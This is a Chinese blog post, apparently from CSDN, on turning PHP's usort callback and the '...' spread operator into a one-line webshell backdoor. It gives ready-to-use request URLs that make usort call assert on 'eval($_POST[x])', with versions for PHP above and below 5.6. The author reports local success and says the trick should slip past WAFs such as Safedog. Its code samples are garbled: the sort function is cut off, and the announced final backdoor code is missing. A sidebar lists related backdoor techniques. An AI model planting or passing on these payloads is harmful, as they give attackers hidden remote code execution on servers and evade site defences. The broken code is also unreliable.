php变量函数后门,PHP函数usort是咋回事?还能当后门?

最新推荐文章于 2023-10-24 12:29:54 发布
最新推荐文章于 2023-10-24 12:29:54 发布
阅读量222 收藏 1
点赞数
文章标签: php变量函数后门

开始

原谅我见识短,没用过usort函数

上面连接的文章中,发现有这个函数

于是刚刚了解了下usort函数

usort函数干嘛的?

通俗点说就是一个稍微复杂点的数组,如果用php自带的函数不是很方便

所以用户可以自己定义一个函数,然后使用usort函数来进行回调

function my_sort($a,$b){

if ($a==$b){

return 0;

}else{

return ($a

}

}

$list = array(4,2,8,6);

usort($list,'my_sort');

第一个参数必须是数组

第二个参数是函数名称

usort函数执行的时候,会依次把$a中的两个值,传递给名字为my_sort函数中,所以你会看到my_sort有两个形参

然后php会判断my_sort函数的返回值

如果为0,则位置不变

如果为-1.则$a位置和$b不变

如果为1,则$a位置和$b互换

有趣的来了

开始里面的文章中,讲到了一个php5.6的新特性

…运算符,对就是三个点

该运算符可以将数组或者可遍历的对象展开变为参数

不过必须是索引数组哦~~~

举个栗子

$list = [1,2,3];

var_dump($list);

echo "========\n";//

var_dump(...$list);

返回结果如下

array(3) {

[0]=>

int(1)

[1]=>

int(2)

[2]=>

int(3)

}

========

int(1)

int(2)

int(3)

编写一句话

先放出最终的代码

那么$_GET变量中的值,应该是

['$a=0','eval($_POST["x"])'],'assert'];

$_GET[0]是usort的第一个参数

$_GET[1]是usort的回调函数名

也就相当于

最终利用是这样的

http://www.url.com/t.php?1[]=1-1&1[]=eval($_POST['x'])&2=assert

我自己本地环境测试成功了~~~

应该能过什么安全狗啊啥的

更新(17-01-19)

上面的一句话,只能在php环境>=5.6才能用

于是更新下,环境>=<5.6都可以的一句话

使用方法

http://www.url.com/test.php?1=1+1&2=eval($_POST[x])

weixin_42299873
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 318
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
巧用成员模板函数为你的类留下后门
关文林的专栏
03-30 5535
 巧用成员模板函数为你的类留下后门如果你的类需要扩展功能,除了修改源码之外,你也可以从这个类派生一个类来对这个类作扩充。比如有如下一个类。class cls{public:    int fun( int a)    {       //一些处理       return 0;    }};类cls有一个函数fun能针对一个int型的数据进行一些必要
php变量函数后门,PHP中使用按位取反(~)函数创建后门
weixin_39981185的博客
03-12 196
1)PHP ~位运算符PHP: 位运算符 - http://www.php.net/manual/zh/language.operators.bitwise.php前一段时间老外在twitter上爆出个有趣的东西,一串疑似乱码的字符串访问后却能正常输出1337,于是便有了以下研究成果。~ $a Not(按位取反) 将 $a 中为 0 的位设为 1,反之亦然。PHP 的 ini 设定 error_r...
php变量函数后门,项目实战 | 记一次对某猥琐PHP后门的爆菊
weixin_39814482的博客
03-12 556
最近遇到个文件,打开一看只有几行注释?看了下字节数却很大,横向进度条很长啊,通过web访问是空白,看上去应该是藏了后门了。ps:这种方式遇到粗心/没有经验的管理员可能混过去,但若使用win自带的记事本(需开启自动换行)则一览无余。实际上换行整理一下:用Notepad++自带的正则替换简单做了下格式处理。另外在下面的代码中发现了eval/*r49557ec*/(还插了注释,这个小方法很有意思,测试...
使用php代码加亮函数构造php后门
heiyeluren的blog(黑夜路人的开源世界)
03-06 2657
使用php代码加亮函数构造php后门* 作者: heiyeluren* 时间: 2006-03-05* 博客: http://blog.csdn.net/heiyeshuwu[  后门构造 ]我们知道php非常强大,并且有很多有趣的功能,比如它就自带了一个php代码加亮的函数,叫做:highlight_string,它的参数就是一个字符串,如果这个字符串中包含了PHP代码,那么它
php数组排序usort、uksortsort函数用法
10-25
主要介绍了php数组排序usort、uksortsort函数用法,详细介绍了usort、uksortsort函数在数组排序中的应用,具有不错的参考借鉴价值,需要的朋友可以参考下
PHP回调函数与匿名函数实例详解
12-20
本文实例讲述了PHP回调函数与匿名函数。分享给大家供大家参考,具体如下: 回调函数和匿名函数 回调函数、闭包在JS中并不陌生,JS使用它可以完成事件机制,进行许多复杂的操作。PHP中却不常使用,今天来说一说PHP...
全面解析PHP常用函数.doc
11-28
* array_walk: 让使用者自订函数能处理数组中的每一个元素 * arsort: 将数组的值由大到小排序 * asort: 将数组的值由小到大排序 * count: 计算变数或数组中的元素个数 * current: 传回数组中目前的元素 * each: 传回...
php常用数组函数实例小结
12-18
PHP编程语言中,数组是数据结构的一种,用于存储一系列有序的...在实际开发中,选择正确的数组函数能有效解决各种问题,如数据整合、过滤、排序、查找等。因此,掌握PHP的数组函数是每个PHP程序员必备的基础技能。
php后门的编写
demo1573的博客
09-15 542
0x1 原理 1、执行系统命令的函数 proc_open, popen, exec, shell_exec,passthru,system 这里只给出两个例子,其他的可以查看php手册编写 system() ? php system($_GET['input']); ? http://192.168.247.133:81/shell.php?input=dir ``执行命令 ``执行命令等...
php usort后门,php – usort()无法正确处理
weixin_42512933的博客
04-14 137
来自json结果的我的数组返回如下:["AuctionInfo"]=>[0]=>array(13) {["price"]=>int(3000)}[1]=>array(13) {["price"]=>int(5000)我试图使用的PHP代码很简单$decoded = json_decode("my json api", true);foreach($decoded['A...
编写变态的(非字母数字的)PHP后门
代码析构师的专栏
05-09 678
在这篇文章中,我将向大家介绍如何编写一个非字母数字的PHP后门。在编写这种PHP后门的时候,我们首先需要了解一些基础知识:     (1)了解PHP     (2)了解curl或者其他一些能够操作HTTP请求的工具   还有一点需要大家了解的是PHP中异或(^)的概念。对于异或,大家肯定都有所了解,但是平常能用到的地方可能不多,最起码本人不经常使用(勿喷)。之所以在这里强调一下异或的概
PHP函数的定义与最简单后门原理
最新发布
一个努力学习网安的小牛马
10-24 129
php简单函数的定义和简单后门的原理
php可变方法,php之可变函数使用方法详解
weixin_30476033的博客
03-28 235
这篇文章主要介绍了php之可变函数的实例详解的相关资料,希望通过本文能帮助到大家,让大家理解掌握可变函数,需要的朋友可以参考下php之可变函数的实例详解php的可变函数,今天大概的了解下,是看php手册总结的,觉得用处不大;PHP 支持可变函数的概念。这意味着如果一个变量名后有圆括号,PHP 将寻找与变量的值同名的函数,并且尝试执行它。可变函数可以用来实现包括回调函数函数表在内的一些用途。可变函...
PHP函数usort是咋回事?还能当后门?
weixin_30701521的博客
04-02 357
开始 详情看这:https://www.leavesongs.com/PHP/bypass-eval-length-restrict.html 原谅我见识短,没用过usort函数 上面连接的文章中,发现有这个函数 于是刚刚了解了下usort函数 usort函数干嘛的? 官方介绍:http://php.net/manual/zh/function.usort.php 通俗点说就是一个稍...
栈溢出攻击2——绕过Canary通过后门函数拿到shell
学习记录
09-16 2171
博文中的程序:点击下载 提取码:qbdd   能看到这篇博客,我相信大家对栈溢出攻击已经有了一定的了解。一个入门级的题目就是程序中本身有后门函数,我们用后门函数的入口地址覆盖当前正在执行函数的返回地址,这样当前函数执行结束之后,就会跳到后门函数执行,从而达到攻击的目的。那么我们有没有办法防范这种攻击呢?答案是有的,我们可以不使用像read、scanf等有缓冲区溢出漏洞的函数,当然,如果无法避免这些函数的使用,我们还可以使用canary机制来保护我们的程序。canary的英文名称是金丝雀,它可以用来判断我们
栈溢出攻击0——利用后门函数拿到shell权限
学习记录
09-12 1293
博文中所用程序:点我下载 提取码:v8qi   在IDA中经过反编译之后可以看到,这个题中seeme函数的功能就是拿到shell,因此不需要再去手动注入shellcode,只需将sayhi函数的返回地址覆盖成seeme函数的入口地址即可。 int seeme() { return system("/bin/sh"); }   在IDA中可以很容易的得到seeme函数的入口地址为0x080485B3,如下图所示。   下面考虑如何覆盖sayhi函数的返回地址。在IDA中,查看sayhi函数的伪代码。
PHP Function usort
more time
03-27 313
使用usort可以用自定义函数来排序 可以用来实现二维数组排序function cmp($a, $b) { if ($a['4'] < $b['4'] || ($a['4'] == $b['4'] && $a['3'] > $b['3'])) return true; return false; } usort($table, 'cmp');table是个二维数组,即array(array
php usort
05-30
`usort()` 函数PHP 中的一个排序函数,它可以按照指定的比较函数对数组进行排序。该函数的语法如下: ``` usort ( array &$array , callable $cmp_function ) : bool ``` 其中,`$array` 是要排序的数组,`$cmp...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值